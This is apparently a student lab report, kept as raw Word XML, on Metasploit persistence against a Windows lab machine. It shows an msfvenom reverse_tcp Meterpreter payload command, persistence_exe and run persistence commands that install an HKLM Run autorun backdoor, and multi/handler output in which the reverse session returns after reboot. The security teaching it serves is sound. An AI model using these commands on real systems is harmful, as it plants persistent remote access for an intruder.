      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc21101971"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 9:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="017004B4" w14:textId="02B762A3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What is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>proper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> post exploit to perform the persistence?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FC9AD" w14:textId="1FF8D01D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</w:p>
    <w:p w14:paraId="27549FFC" w14:textId="2C057D41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ab/>
        <w:t xml:space="preserve">The proper post exploit to perform the persistence is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>persistence_exe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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2FDAE" w14:textId="35FE9C72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</w:p>
    <w:p w14:paraId="03C49171" w14:textId="6B9E6155" w:rsidR="00B93457" w:rsidRPr="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B93457">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc21101972"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 10:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="48843DFF" w14:textId="4443CB0C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Perform the exploit and report the commands/options you used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D16E1D" w14:textId="387A37CF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</w:p>
    <w:p w14:paraId="43BBE1FB" w14:textId="219649E1" w:rsidR="00B93457" w:rsidRDefault="00F83116" w:rsidP="00B934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Similarly</w:t>
      </w:r>
      <w:r w:rsidR="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to last </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>weeks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> assignment, a payload was created using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B93457">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D738C0" w14:textId="29A8E4DC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</w:p>
    <w:p w14:paraId="23FD8FB5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6220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usr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bin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msfvenom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p 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meterpreter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reverse_tcp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LPORT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4449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LHOST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0.16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x86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e x86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shikata_ga_nai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 exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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platform windows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4F608DDC" w14:textId="34E84744" w:rsidR="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B93457">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E02C1FC" w14:textId="6D3DFFE8" w:rsidR="00F83116" w:rsidRDefault="00F83116" w:rsidP="00B934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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The hack.exe file was stored in the /var/www/html/ directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F5B57" w14:textId="5CB026BE" w:rsidR="00F83116" w:rsidRDefault="00F83116" w:rsidP="00B93457">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCB36E4" w14:textId="6D8C4AF4" w:rsidR="00F83116" w:rsidRDefault="00F83116" w:rsidP="00B934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Here are the next steps taken to persists on the target system</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the generated payload are the following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C751D" w14:textId="6535C462" w:rsidR="00F83116" w:rsidRDefault="00F83116" w:rsidP="00B93457">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A6379F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exploit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multi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handler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</w:p>
    <w:p w14:paraId="54B09006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REXEPATH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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>var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www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html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1492180A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REXEPATH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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>var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www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html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43B0F3A7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REXENAME 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76801419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REXENAME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2A8FF965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705F6A56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177F4C7F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STARTUP SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6634E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STARTUP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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C5F88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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29C716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against ADMIN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2BDBD2BA8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7794D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Reading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Payload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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>var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www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html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72853E6F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Persistent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written to C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\WINDOWS\TEMP\hack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7CB922C1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Executing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 C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\WINDOWS\TEMP\hack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65773ED2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Agent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executed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088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PID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB1F01B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Installing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autorun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HKLM\Software\Microsoft\Windows\CurrentVersion\Run\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gmaiDMHnVkcD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07551248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Installed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autorun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HKLM\Software\Microsoft\Windows\CurrentVersion\Run\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gmaiDMHnVkcD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65AAF8CB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Cleanup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Meterpreter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RC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File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/root/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msf4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logs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persistence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ADMIN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2BDBD2BA8_20191004.1802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ADMIN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2BDBD2BA8_20191004.1802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rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B177D21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execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD7E1F" w14:textId="7F283EB7" w:rsidR="00F83116" w:rsidRDefault="008B0D7C" w:rsidP="00F83116">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman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DDB0DDD" w14:textId="2120FCFD" w:rsidR="00F83116" w:rsidRDefault="00540C98" w:rsidP="00540C98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc21101973"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 11:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="09964AF5" w14:textId="61F5BD27" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98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Confirm that a Meterpreter session is created when you login back to the Windows machine. Report the commands you used to setup the multi/handler module and a screenshot of the current Meterpreter session that has been opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6658FC" w14:textId="77777777" w:rsidR="00540C98" w:rsidRPr="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98"/>
    <w:p w14:paraId="5CBA4CCF" w14:textId="0E96F4F7" w:rsidR="00F83116" w:rsidRDefault="00F83116" w:rsidP="00F83116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 xml:space="preserve">Now that we have persistence set up, </w:t>
      </w:r>
      <w:r w:rsidR="008B0D7C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">we have to set up the exploit/multi/handler exploit and reboot the target system to verify that persistence </w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidR="008B0D7C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>was done correctly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30007797" w14:textId="77777777" w:rsidR="00F83116" w:rsidRPr="00F83116" w:rsidRDefault="00F83116" w:rsidP="00F8311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331DA89D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exploit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multi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handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA690C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multi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handler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LHOST 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0.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCA2BD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multi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handler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LPORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBFB09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multi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handler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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA61F5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Started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reverse TCP handler on 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0.16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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECDE1A" w14:textId="6AD3EF85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stage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180291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 xml:space="preserve">0.17 </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0D7C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="008B0D7C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Occurred after reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D116D13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Meterpreter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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666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opened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0.16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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4449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0.17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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1025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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2019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04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04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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>37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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>36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0700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509265D1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B58DCC4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meterpreter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438B20" w14:textId="77777777" w:rsidR="008B0D7C" w:rsidRDefault="008B0D7C" w:rsidP="008B0D7C">
      <w:pPr>
        <w:widowControl/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</w:p>
    <w:p w14:paraId="76CB1C51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4B6FA74E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58CAF864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2F0C91EC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09F835DF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73063CAE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7299BF87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62E6C5BB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578220E2" w14:textId="30FAABBD" w:rsidR="008B0D7C" w:rsidRDefault="008B0D7C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lastRenderedPageBreak/>
        <w:t>Screenshot of another successful attempt after another reboot</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the target system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF9347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29DFED36" w14:textId="6FB144C0" w:rsidR="008B0D7C" w:rsidRPr="008B0D7C" w:rsidRDefault="00540C98" w:rsidP="00540C98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4227F4E" wp14:editId="1A7AAFA6">
            <wp:extent cx="5032857" cy="142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57" cy="142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AFAA" w14:textId="0651D307" w:rsidR="008B0D7C" w:rsidRDefault="008B0D7C" w:rsidP="00B93457"/>
    <w:p w14:paraId="0C196AEB" w14:textId="6610076F" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc21101974"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 12:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0FFA221A" w14:textId="75D10F27" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98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Using Meterpreter without using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>any other exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> show a different way to perform persistence on a target machine. Report the commands you used to do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F3138" w14:textId="69CD2657" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E44B8C9" w14:textId="4E756C4C" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98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Here is the command used in a Meterpreter session to obtain persistence in the target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEB03F" w14:textId="77777777" w:rsidR="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B3066F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meterpreter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 persistence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>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4449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 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0.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AC4E9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A3110C2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[!]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Meterpreter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scripts are deprecated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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CD4D0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[!]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Example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 post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OPTION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88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[...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D36CF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Persistence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Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C77CA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cleanup created at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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msf4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logs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persistence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ADMIN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2BDBD2BA8_20191004.4410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ADMIN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2BDBD2BA8_20191004.4410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rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C835B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Creating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Payload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meterpreter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reverse_tcp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LHOST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0.16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LPORT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4449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13282762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Persistent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agent script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088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99697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</w:p>
    <w:p w14:paraId="067B8E9B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Persistent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written to C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\WINDOWS\TEMP\NrNXArM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vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A8608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Executing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 C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\WINDOWS\TEMP\NrNXArM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vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94C3D1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Agent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executed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088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PID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1480</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28D36A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Installing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autorun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HKLM\Software\Microsoft\Windows\CurrentVersion\Run\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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CCzyuuYyxPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C433C9B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Installed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autorun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HKLM\Software\Microsoft\Windows\CurrentVersion\Run\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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CCzyuuYyxPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A7901DE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meterpreter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0B7D87BD" w14:textId="4F49695B" w:rsidR="00540C98" w:rsidRPr="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C9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3144170" w14:textId="77777777" w:rsidR="00540C98" w:rsidRPr="00540C98" w:rsidRDefault="00540C98" w:rsidP="00540C98"/>
    <w:sectPr w:rsidR="00540C98" w:rsidRPr="00540C98" w:rsidSect="00512C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1B4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="226CCB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041B06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E66773C"/>
    <w:lvl w:ilvl="0" w:tplc="F08E0762">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Georg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57"/>
    <w:rsid w:val="00362087"/>
    <w:rsid w:val="00512C83"/>
    <w:rsid w:val="00540C98"/>
    <w:rsid w:val="005A41B9"/>
    <w:rsid w:val="00677663"/>
    <w:rsid w:val="007C2510"/>
    <w:rsid w:val="007E3DFF"/>
    <w:rsid w:val="008B0D7C"/>
    <w:rsid w:val="008E2157"/>
    <w:rsid w:val="00946D81"/>
    <w:rsid w:val="00B93457"/>
    <w:rsid w:val="00C45AEC"/>
    <w:rsid w:val="00E9040A"/>
    <w:rsid w:val="00F83116"/>
    <w:rsid w:val="00FA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376B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8150BB0-3CDE-4A72-ABA5-A8CAE81D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57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1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1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1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5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157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1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21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E215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E215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E2157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21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1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215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E2157"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi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E2157"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008E2157"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2157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E2157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8E21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E21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2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157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8E2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157"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2157"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008E2157"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008E2157"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008E2157"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2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270111DFB44E048CD758282BE6D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6F1FE-964E-488C-B719-C3314DFF4915}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003968D7" w:rsidRDefault="003968D7" w:rsidP="003968D7">
          <w:pPr>
            <w:pStyle w:val="89270111DFB44E048CD758282BE6DDE9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FFA66547B84849DCA456740455339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74781-FE9D-4780-A5C9-E770201B1656}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003968D7" w:rsidRDefault="003968D7" w:rsidP="003968D7">
          <w:pPr>
            <w:pStyle w:val="FFA66547B84849DCA4567404553392F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319910E9E0140C8BAFD8C4778E9D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301A5-9ADF-4EC2-BD53-75107115251C}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003968D7" w:rsidRDefault="003968D7" w:rsidP="003968D7">
          <w:pPr>
            <w:pStyle w:val="D319910E9E0140C8BAFD8C4778E9D6E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3B96B42C8C34A17AC54477CFD572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666E5-C13D-48CE-949C-4408B4C68DB4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003968D7" w:rsidRDefault="003968D7" w:rsidP="003968D7">
          <w:pPr>
            <w:pStyle w:val="83B96B42C8C34A17AC54477CFD5720C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D7"/>
    <w:rsid w:val="003968D7"/>
    <w:rsid w:val="008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270111DFB44E048CD758282BE6DDE9">
    <w:name w:val="89270111DFB44E048CD758282BE6DDE9"/>
    <w:rsid w:val="003968D7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FFA66547B84849DCA4567404553392F9">
    <w:name w:val="FFA66547B84849DCA4567404553392F9"/>
    <w:rsid w:val="003968D7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D319910E9E0140C8BAFD8C4778E9D6EC">
    <w:name w:val="D319910E9E0140C8BAFD8C4778E9D6EC"/>
    <w:rsid w:val="003968D7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="83B96B42C8C34A17AC54477CFD5720CE">
    <w:name w:val="83B96B42C8C34A17AC54477CFD5720CE"/>
    <w:rsid w:val="00396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582A93-F572-451A-9EE9-52286DF666E6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301180252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4294967004</TotalTime>
  <Pages>1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CMPT 489</Company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Marcelo Ollin Paco Zepeda</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zully comas</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2019-11-26T04:27:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-04T23:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-26T04:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>